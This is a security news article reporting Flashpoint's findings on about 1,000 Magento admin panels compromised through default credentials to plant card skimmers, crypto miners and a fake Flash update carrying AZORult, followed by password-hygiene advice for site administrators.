Hacked Magento Sites Steal Card Data, Spread Malware

Cybercriminals are targeting websites running the Magento platform to inject them with code that can steal credit card data and infect visitors with malware, Flashpoint reports.

The open-source platform written in PHP has long stirred threat actors’ interest due to its popularity among online e-commerce sites. According to Flashpoint, members of entry-level and top-tier Deep & Dark Web forums have shown continued interest in the platform since 2016, and also targeted content management systems such as Powerfront CMS and OpenCart.

As part of the newly observed attacks, hackers are attempting to brute-force Magento administration panels. Once they gain access, malware capable of scraping credit card numbers is installed, along with crypto-currency miners.

At least 1,000 Magento admin panels have been compromised, Flashpoint says. The attackers attempt to log in using common and known default Magento credentials, once again proving that changing the credentials upon installation of the platform can prevent compromise.

After gaining control of the site’s Magento CMS admin panel, the attackers have unfettered access to the site and can inject any script they want. In this case, they injected malicious code in the Magento core file to access pages where payment data was processed. Because of that, they could intercept POST requests to the server containing sensitive data and redirect those to the attacker.

The compromised sites also revealed the use of an exploit masquerading as an Adobe Flash Player update. If launched, the fake update would run malicious JavaScript to download data-stealing malware called AZORult from GitHub. The malware then downloads the Rarog cryptocurrency miner.

The accounts hosting the malicious files have been active since 2017 and the security researchers observed that the attackers would update the files daily to avoid detection by signature- and behavior-based tools.

Most of the 1,000 compromised panels are in the education and healthcare industries in the United States and Europe. However, the researchers believe that the compromised sites they are aware of might be part of a larger sample of infected Magento panels.

To keep their sites and users protected, Magento admins are advised to review CMS account logins and enforce strong password-hygiene practices to mitigate their exposure to brute-force attacks. They should restrict the recycling of previously used passwords, enable two-factor authentication for sensitive systems and applications, and provide secure password managers to their users.

“The rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords,” Flashpoint notes.

Weak credentials in Internet of Things (IoT) devices have been long said to fuel botnets, but others where a good password hygiene isn’t enforced are as exposed as these devices. Even industrial control system (ICS) products contain default credentials and could be impacted.

Related: Compromised Credentials: The Primary Point of Attack for Data Breaches

Related: Cameras Top Source of IoT Attacks: Kaspersky

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags: